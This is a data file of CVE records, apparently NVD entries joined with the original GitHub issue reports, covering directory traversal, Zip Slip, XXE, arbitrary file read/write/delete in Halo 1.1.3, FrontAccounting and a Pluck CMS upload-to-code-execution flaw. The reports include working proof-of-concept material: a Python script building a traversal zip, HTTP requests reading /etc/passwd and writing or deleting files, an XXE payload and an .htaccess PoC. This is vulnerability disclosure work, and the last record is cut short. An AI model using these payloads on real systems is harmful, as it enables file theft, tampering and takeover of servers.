[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:frontaccounting:frontaccounting:2.4.7:*:*:*:*:*:*:*", "matchCriteriaId": "525A049E-5790-4686-AAB0-580648615E28", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "22" ]
22
https://github.com/FrontAccountingERP/FA/issues/40
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "FrontAccountingERP", "FA" ]
### test version:2.4.7 ### 0x00 description Frontaccounting is using the function clean_file_name() to eliminate '../' in the file name submitted by the user to avoid directory traversal vulnerability. ![2019-11-12_103343](https://user-images.githubusercontent.com/33822448/68640026-74465180-0541-11ea-9472-55c458e23d4c.png) However, some variables do not use the function clean_file_name() in admin/inst_lang.php, which can cause attackers submit the language package containing the language code of '../'. Affter adding successfully, by deleting it, the attacker can emptied specified folder like the examples. admin/inst_lang.php:156 ![2019-11-12_104009](https://user-images.githubusercontent.com/33822448/68640041-81634080-0541-11ea-99a2-e80748de3051.png) admin/inst_lang.php:240 ![2019-11-12_104205](https://user-images.githubusercontent.com/33822448/68640053-8922e500-0541-11ea-93fa-f75c5f173761.png) ### 0x01 Example:empty admin folder 0. Before clearing the admin folder ![2019-11-12_113112](https://user-images.githubusercontent.com/33822448/68640065-8e802f80-0541-11ea-9d7e-461486d20516.png) 1. The administrator logs in and creates a new language pack ![2019-11-12_112847](https://user-images.githubusercontent.com/33822448/68640076-97710100-0541-11ea-9786-cc14f20fd813.png) ![2019-11-12_112935](https://user-images.githubusercontent.com/33822448/68640080-993ac480-0541-11ea-9366-09cb1cf5514e.png) 2. Set the language code to ../admin and save it ![2019-11-12_113003](https://user-images.githubusercontent.com/33822448/68640086-9c35b500-0541-11ea-93d4-1902a895fe8a.png) 3. Delete the language pack you just created ![2019-11-12_113206](https://user-images.githubusercontent.com/33822448/68640093-9fc93c00-0541-11ea-8d40-156be986b08c.png) 4. After deleting successfully, the admin folder will be emptied ![2019-11-12_113248](https://user-images.githubusercontent.com/33822448/68640098-a35cc300-0541-11ea-9909-7be66130ba7b.png)
A Directory Traversal vulnerability
https://api.github.com/repos/FrontAccountingERP/FA/issues/40/comments
3
2019-11-12T03:59:14Z
2022-11-24T03:32:50Z
https://github.com/FrontAccountingERP/FA/issues/40
521,314,213
40
1,442
CVE-2020-21522
2020-09-30T18:15:23.880
An issue was discovered in halo V1.1.3. A Zip Slip Directory Traversal Vulnerability in the backend,the attacker can overwrite some files, such as ftl files, .bashrc files in the user directory, and finally get the permissions of the operating system.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/halo-dev/halo/issues/418" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/halo-dev/halo/issues/418" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:halo:halo:1.1.3:*:*:*:*:*:*:*", "matchCriteriaId": "6AAE0537-C39F-4121-AA74-28235A4DC07A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "22" ]
22
https://github.com/halo-dev/halo/issues/418
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "halo-dev", "halo" ]
<!-- 如果你不认真勾选下面的内容,我可能会直接关闭你的 Issue。 提问之前,建议先阅读 https://github.com/ruby-china/How-To-Ask-Questions-The-Smart-Way --> **I am sure I have checked** - [x] [Halo User Guide Documentation ](https://halo.run/docs) - [x] [Halo BBS](https://bbs.halo.run) - [x] [Github Wiki ](https://github.com/halo-dev/halo/wiki/4.-%E5%B8%B8%E8%A7%81%E9%97%AE%E9%A2%98) - [x] [Other Issues](https://github.com/halo-dev/halo/issues) ---- **I want to apply** - [x] BUG feedback When we want to install a theme, we can choose to download and install it from a remote http address, When downloading a zip file and decompressing it, there is no path verification, and it can be decompressed to any path in any operating system. This is very dangerous and can allow malicious people to obtain operating system permissions. First make a evil zip file,Make this zip file using python code ```python import zipfile, sys if(len(sys.argv) != 2): print "[+] Usage : python exploit.py file_to_do_the_traversal [+]" print "[+] Example: python exploit.py test.txt" exit(0) zf = zipfile.ZipFile("evil-foo.zip", "w") zf.write(sys.argv[1], "..\\..\\..\\..\\..\\..\\..\\..\\tmp\\\\test.txt") zf.close() print "[+] Created evil.zip successfully [+]" ``` like this ![image](https://user-images.githubusercontent.com/16250867/70613552-cca56780-1c43-11ea-8784-660a7f7b7665.png) Then start an http service and use the installation theme feature to start the installation ``` POST /api/admin/themes/fetching?uri=http:%2F%2F127.0.0.1:2333/evil-foo.zip HTTP/1.1 Host: 100.101.61.13:8090 Content-Length: 0 Admin-Authorization: 6ccadd335f0d4719a9418c0b16cfdc99 Accept: application/json, text/plain, */* User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36 Origin: http://100.101.61.13:8090 Referer: http://100.101.61.13:8090/admin/index.html Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close ``` Then you can see that our file test.txt is decompressed to the / tmp directory. ![image](https://user-images.githubusercontent.com/16250867/70613889-6e2cb900-1c44-11ea-81f4-d5ce44b7cd6d.png) Therefore, the attacker can overwrite some files, such as ftl files, .bashrc files in the user directory, and finally get the permissions of the operating system
A Zip Slip Directory Traversal Vulnerability in the backend
https://api.github.com/repos/halo-dev/halo/issues/418/comments
0
2019-12-11T10:35:33Z
2019-12-12T16:19:06Z
https://github.com/halo-dev/halo/issues/418
536,283,129
418
1,443
CVE-2020-21524
2020-09-30T18:15:24.023
There is a XML external entity (XXE) vulnerability in halo v1.1.3, The function of importing other blogs in the background(/api/admin/migrations/wordpress) needs to parse the xml file, but it is not used for security defense, This vulnerability can detect the intranet, read files, enable ddos attacks, etc. exp:https://github.com/halo-dev/halo/issues/423
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.4, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.1, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.2, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/halo-dev/halo/issues/423" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/halo-dev/halo/issues/423" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:halo:halo:1.1.3:-:*:*:*:*:*:*", "matchCriteriaId": "1CB4664A-F423-4172-B79D-C082E4DDBC76", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "611" ]
611
https://github.com/halo-dev/halo/issues/423
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "halo-dev", "halo" ]
<!-- 如果你不认真勾选下面的内容,我可能会直接关闭你的 Issue。 提问之前,建议先阅读 https://github.com/ruby-china/How-To-Ask-Questions-The-Smart-Way --> **I am sure I have checked** - [x] [Halo User Guide Documentation ](https://halo.run/docs) - [x] [Halo BBS](https://bbs.halo.run) - [x] [Github Wiki ](https://github.com/halo-dev/halo/wiki/4.-%E5%B8%B8%E8%A7%81%E9%97%AE%E9%A2%98) - [x] [Other Issues](https://github.com/halo-dev/halo/issues) ---- **I want to apply** - [x] BUG feedback There is a function of importing other blogs in the background. This function needs to parse the xml file, but it is not used for security defense, such as setFeature ("http://apache.org/xml/features/disallow-doctype-decl", true) ; ![image](https://user-images.githubusercontent.com/16250867/70616650-dfbb3600-1c49-11ea-8a18-65abbc6f1864.png) So there is a XML external entity (XXE) vulnerability,This vulnerability can detect the intranet, read files, ddos attacks, etc. Demonstrate reading files First construct an evil xml file. When the file is parsed, read the `/tmp/xxe.txt` file and put the result into the category list field. ![image](https://user-images.githubusercontent.com/16250867/70618618-480c1680-1c4e-11ea-9be2-5a80d56e5d60.png) ```xml <?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE a [ <!ENTITY xxe SYSTEM "file:///tmp/xxe.txt"> ]> <rss version="2.0" xmlns:excerpt="http://wordpress.org/export/1.2/excerpt/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:wp="http://wordpress.org/export/1.2/" > <wp:category><wp:term_id>7</wp:term_id><wp:category_nicename>&xxe;</wp:category_nicename><wp:category_parent>test</wp:category_parent><wp:cat_name>&xxe;</wp:cat_name></wp:category> <wp:tag><wp:term_id>11</wp:term_id><wp:tag_slug>test</wp:tag_slug><wp:tag_name><![CDATA[test]]></wp:tag_name></wp:tag> <item> <title>WordPress for SAE</title> <link>http://github.com</link> <pubDate>Mon, 21 Apr 2014 17:32:57 +0000</pubDate> <dc:creator><![CDATA[zealseeker]]></dc:creator> <guid isPermaLink="false">http://github.com</guid> <description></description> <content:encoded> <![CDATA[]]></content:encoded> <excerpt:encoded><![CDATA[]]></excerpt:encoded> <wp:post_id>1</wp:post_id> <wp:post_date>2014-04-22 01:32:57</wp:post_date> <wp:post_date_gmt>2014-04-21 17:32:57</wp:post_date_gmt> <wp:comment_status>open</wp:comment_status> <wp:ping_status>open</wp:ping_status> <wp:post_name>hello-world</wp:post_name> <wp:status>draft</wp:status> <wp:post_parent>0</wp:post_parent> <wp:menu_order>0</wp:menu_order> <wp:post_type>post</wp:post_type> <wp:post_password></wp:post_password> <wp:is_sticky>0</wp:is_sticky> <category domain="category" nicename="uncategorized"><![CDATA[未分类]]></category> <wp:postmeta> <wp:meta_key>_edit_last</wp:meta_key> <wp:meta_value><![CDATA[1]]></wp:meta_value> </wp:postmeta> </item> <channel> </channel> </rss> ``` Upload this file to the system and get the file path `upload/2019/12/wp-66897ae127a54923a4987d1374420271.xml` Using the imported wordpress blog information interface to trigger a vulnerability ``` POST /api/admin/migrations/wordpress HTTP/1.1 Host: xxx:8090 Content-Length: 209 Admin-Authorization: b57cb92ad8ec451f8b8a04541028080f Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAOd7ukTz7mQkG2jP Origin: http:/xxx:8090 Referer: http://xxxx:8090/admin/index.html Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close ------WebKitFormBoundaryAOd7ukTz7mQkG2jP Content-Disposition: form-data; name="file"; filename="test.xml" Content-Type: application/xml /root/.halo/upload/2019/12/wp-66897ae127a54923a4987d1374420271.xml ------WebKitFormBoundaryAOd7ukTz7mQkG2jP-- ``` After sending the above message, you can see the contents of the `/tmp/xxe.txt` file in the background classification directory. ![image](https://user-images.githubusercontent.com/16250867/70617774-52c5ac00-1c4c-11ea-887f-ad52b034b63a.png) Bug fix recommendations: setFeature ("http://apache.org/xml/features/disallow-doctype-decl", true) ; https://find-sec-bugs.github.io/bugs.htm#XXE_SAXPARSER
A XML external entity (XXE) vulnerability in the backend
https://api.github.com/repos/halo-dev/halo/issues/423/comments
1
2019-12-11T11:44:59Z
2019-12-12T17:08:25Z
https://github.com/halo-dev/halo/issues/423
536,318,212
423
1,444
CVE-2020-21525
2020-09-30T18:15:24.083
Halo V1.1.3 is affected by: Arbitrary File reading. In an interface that reads files in halo v1.1.3, a directory traversal check is performed on the input path parameter, but the startsWith function can be used to bypass it.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/halo-dev/halo/issues/420" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/halo-dev/halo/issues/420" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:halo:halo:1.1.3:*:*:*:*:*:*:*", "matchCriteriaId": "6AAE0537-C39F-4121-AA74-28235A4DC07A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "22" ]
22
https://github.com/halo-dev/halo/issues/420
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "halo-dev", "halo" ]
<!-- 如果你不认真勾选下面的内容,我可能会直接关闭你的 Issue。 提问之前,建议先阅读 https://github.com/ruby-china/How-To-Ask-Questions-The-Smart-Way --> **I am sure I have checked** - [x] [Halo User Guide Documentation ](https://halo.run/docs) - [x] [Halo BBS](https://bbs.halo.run) - [x] [Github Wiki ](https://github.com/halo-dev/halo/wiki/4.-%E5%B8%B8%E8%A7%81%E9%97%AE%E9%A2%98) - [x] [Other Issues](https://github.com/halo-dev/halo/issues) ---- **I want to apply** - [x] BUG feedback In an interface that reads files in the background, a directory traversal check is performed on the input path parameter, but the startsWith function can be used to bypass it. ![image](https://user-images.githubusercontent.com/16250867/70615169-dd0b1180-1c46-11ea-8a92-918a7134fee8.png) So I can read any file using the following message ![image](https://user-images.githubusercontent.com/16250867/70615059-a59c6500-1c46-11ea-9c60-7413c0d60047.png) ``` GET /api/admin/themes/caicai_anatole/files/content?path=%2Froot%2F.halo%2Ftemplates%2Fthemes%2Fanatole%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2F/passwd HTTP/1.1 Host: 100.101.61.13:8090 Admin-Authorization: 19cfedbb4994443c8b3f7eebf9ef36b3 Accept: application/json, text/plain, */* User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36 Referer: http://100.101.61.13:8090/admin/index.html Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close ```
An Arbitrary File reading vulnerability in the backend(bypass the Path check)
https://api.github.com/repos/halo-dev/halo/issues/420/comments
1
2019-12-11T10:52:58Z
2019-12-12T17:13:17Z
https://github.com/halo-dev/halo/issues/420
536,292,011
420
1,445
CVE-2020-21526
2020-09-30T18:15:24.163
An Arbitrary file writing vulnerability in halo v1.1.3. In an interface to write files in the background, a directory traversal check is performed on the input path parameter, but the startsWith function can be used to bypass it.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/halo-dev/halo/issues/421" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/halo-dev/halo/issues/421" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:halo:halo:1.1.3:*:*:*:*:*:*:*", "matchCriteriaId": "6AAE0537-C39F-4121-AA74-28235A4DC07A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "22" ]
22
https://github.com/halo-dev/halo/issues/421
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "halo-dev", "halo" ]
<!-- 如果你不认真勾选下面的内容,我可能会直接关闭你的 Issue。 提问之前,建议先阅读 https://github.com/ruby-china/How-To-Ask-Questions-The-Smart-Way --> **I am sure I have checked** - [x] [Halo User Guide Documentation ](https://halo.run/docs) - [x] [Halo BBS](https://bbs.halo.run) - [x] [Github Wiki ](https://github.com/halo-dev/halo/wiki/4.-%E5%B8%B8%E8%A7%81%E9%97%AE%E9%A2%98) - [x] [Other Issues](https://github.com/halo-dev/halo/issues) ---- **I want to apply** - [x] BUG feedback An interface to write files in the background, a directory traversal check is performed on the input path parameter, but the startsWith function can be used to bypass it. ``` PUT /api/admin/themes/caicai_anatole/files/content HTTP/1.1 Host: xxxx:8090 Content-Length: 105 Admin-Authorization: 19cfedbb4994443c8b3f7eebf9ef36b3 Accept: application/json, text/plain, */* User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36 Content-Type: application/json;charset=UTF-8 Origin: http://xxx:8090 Referer: http://xxxx:8090/admin/index.html Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close {"path":"/root/.halo/templates/themes/anatole/../../../../../../tmp/pwned","content":"xxxxx\nxxxttt\nbb"} ``` ![image](https://user-images.githubusercontent.com/16250867/70615930-4f302600-1c48-11ea-92ec-9cf3c27f64cc.png) Therefore, the attacker can overwrite some files, such as ftl files, .bashrc files in the user directory, and finally get the permissions of the operating system
An Arbitrary file writing vulnerability in the backend
https://api.github.com/repos/halo-dev/halo/issues/421/comments
0
2019-12-11T11:00:30Z
2019-12-12T16:21:37Z
https://github.com/halo-dev/halo/issues/421
536,295,949
421
1,446
CVE-2020-21527
2020-09-30T18:15:24.227
There is an Arbitrary file deletion vulnerability in halo v1.1.3. A backup function in the background allows a user, when deleting their backup files, to delete any files on the system through directory traversal.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "COMPLETE", "baseScore": 8.5, "confidentialityImpact": "NONE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:S/C:N/I:C/A:C", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 9.2, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.7, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 3.1, "impactScore": 4, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/halo-dev/halo/issues/422" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/halo-dev/halo/issues/422" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:halo:halo:1.1.3:*:*:*:*:*:*:*", "matchCriteriaId": "6AAE0537-C39F-4121-AA74-28235A4DC07A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "22" ]
22
https://github.com/halo-dev/halo/issues/422
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "halo-dev", "halo" ]
<!-- 如果你不认真勾选下面的内容,我可能会直接关闭你的 Issue。 提问之前,建议先阅读 https://github.com/ruby-china/How-To-Ask-Questions-The-Smart-Way --> **I am sure I have checked** - [x] [Halo User Guide Documentation ](https://halo.run/docs) - [x] [Halo BBS](https://bbs.halo.run) - [x] [Github Wiki ](https://github.com/halo-dev/halo/wiki/4.-%E5%B8%B8%E8%A7%81%E9%97%AE%E9%A2%98) - [x] [Other Issues](https://github.com/halo-dev/halo/issues) ---- **I want to apply** - [x] BUG feedback There is a backup function in the background. When we delete our backup files, we can delete any files on the system through directory traversal. ``` DELETE /api/admin/backups/halo?filename=../test.txt HTTP/1.1 Host: xxx:8090 Admin-Authorization: 19cfedbb4994443c8b3f7eebf9ef36b3 Accept: application/json, text/plain, */* User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36 Origin: http://xxxx:8090 Referer: http://xx/admin/index.html Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close ``` My backup file directory is at `/tmp/halo-backup/`. The above message can delete the test.txt file in the `/tmp` directory
An Arbitrary file deletion vulnerability in the backend
https://api.github.com/repos/halo-dev/halo/issues/422/comments
0
2019-12-11T11:06:14Z
2019-12-12T16:32:49Z
https://github.com/halo-dev/halo/issues/422
536,298,956
422
1,447
CVE-2020-21564
2020-09-30T18:15:24.303
An issue was discovered in Pluck CMS 4.7.10-dev2 and 4.7.11. There is a file upload vulnerability that can cause a remote command execution via admin.php?action=files.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/pluck-cms/pluck/issues/83" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/pluck-cms/pluck/issues/91" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/pluck-cms/pluck/issues/83" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/pluck-cms/pluck/issues/91" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:pluck-cms:pluck:4.7.10:dev2:*:*:*:*:*:*", "matchCriteriaId": "960CA1A9-1510-488A-82C2-14AFA3AF7FBE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:pluck-cms:pluck:4.7.11:*:*:*:*:*:*:*", "matchCriteriaId": "B5BD7966-27D7-48D5-8B6B-5A9A8BAB508A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "434" ]
434
https://github.com/pluck-cms/pluck/issues/83
[ "Exploit", "Third Party Advisory" ]
github.com
[ "pluck-cms", "pluck" ]
Vulnerability location: /data/inc/file.php line:42 ![image](https://user-images.githubusercontent.com/55877767/67195146-04a1e280-f42b-11e9-9b70-023bde63d1a7.png) If the file name is '.htaccess', the strpos function returns a result of 0. Demo: Upload these two files in the management file interface. ![image](https://user-images.githubusercontent.com/55877767/67190788-32832900-f423-11e9-838d-847fd6c15d8f.png) ![image](https://user-images.githubusercontent.com/55877767/67195721-0ae48e80-f42c-11e9-9dcc-a0100205d417.png) Access in /files/1.txt. ![image](https://user-images.githubusercontent.com/55877767/67190921-62323100-f423-11e9-8507-78ce8cbf8f40.png) Successful execution. Then upload attack code. ![image](https://user-images.githubusercontent.com/55877767/67191254-e71d4a80-f423-11e9-8de6-bb721a3e6f1d.png) ![image](https://user-images.githubusercontent.com/55877767/67191968-36b04600-f425-11e9-96de-df355c8edc79.png) Successfully obtained the shell. Poc: ``` .htaccess <FilesMatch "1"> SetHandler application/x-httpd-php </FilesMatch> ```
Pluck-4.7.10-dev2 admin background exists a remote command execution vulnerability in the management file interface.
https://api.github.com/repos/pluck-cms/pluck/issues/83/comments
5
2019-10-21T09:08:10Z
2020-05-01T07:25:08Z
https://github.com/pluck-cms/pluck/issues/83
509,831,136
83
1,448
CVE-2020-21564
2020-09-30T18:15:24.303
An issue was discovered in Pluck CMS 4.7.10-dev2 and 4.7.11. There is a file upload vulnerability that can cause a remote command execution via admin.php?action=files.
